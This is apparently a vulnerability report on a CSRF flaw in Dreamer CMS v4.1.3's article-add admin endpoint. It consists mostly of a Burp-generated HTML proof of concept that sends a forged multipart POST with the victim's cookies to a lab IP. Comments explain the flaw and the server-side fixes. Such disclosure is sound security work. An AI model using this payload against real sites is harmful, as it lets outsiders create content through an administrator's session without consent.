
There is a csrf in the newly added section of article management.md


Target is https://github.com/iteachyou-wjn/dreamer_cms

Version: 4.1.3

Dreamer CMS v4.1.3 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /admin/archives/add

图片

Create the PoC:

图片

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <!--
    Reproduction page for the report above. When the button is clicked, the
    visitor's browser replays a captured multipart POST to /admin/archives/add.
    Nothing in the request ties it to this page: the only credential it carries
    is the session cookie the browser attaches on its own (withCredentials).
    The fix belongs on the server: require a per-session anti-CSRF token on
    state-changing admin endpoints, verify the Origin/Referer header, and mark
    the session cookie SameSite so it is not sent on cross-site requests.
  -->
  <body>
  <!-- Changes only the displayed URL to "/"; it does not affect the request. -->
  <script>history.pushState('', '', '/')</script>
    <script>
      // Sends one forged multipart/form-data POST to the archive-add endpoint.
      // Triggered by the button below; the response is never read.
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        // Target as captured: a private-network host and port, presumably the
        // reporter's lab instance rather than anything in the upstream project.
        xhr.open("POST", "http:\/\/192.168.247.186:8888\/admin\/archives\/add", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3");
        // multipart/form-data is a CORS-safelisted content type, so this
        // cross-origin POST is sent without a preflight even though the
        // response is not readable from this origin.
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------118551003424823");
        // Ask the browser to attach the victim's cookies; this is the only
        // authentication the request carries.
        xhr.withCredentials = true;
        // Raw multipart body copied from the captured request. No anti-CSRF
        // token field appears anywhere in it — that absence is the defect.
        var body = "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"categoryId\"\r\n" + 
          "\r\n" + 
          "46041acafe0444ac95870f165977b6a0\r\n" + 
          "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"categoryIds\"\r\n" + 
          "\r\n" + 
          ".wqz18j7q\r\n" + 
          "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"imagePath\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"title\"\r\n" + 
          "\r\n" + 
          "cs\r\n" + 
          "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"weight\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"clicks\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"file\"; filename=\"\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"description\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"telephone\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"content\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"reply\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"comment\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"subscribe\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"status\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "-----------------------------118551003424823--\r\n";
        // Copy the string into a byte array one UTF-16 code unit at a time.
        // Storing into a Uint8Array keeps only the low 8 bits of each code
        // unit; harmless here because the body above is pure ASCII.
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        // Send as a Blob so the body bytes go out exactly as assembled.
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <!-- Manual trigger for the reproduction. -->
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

Succeeded:

图片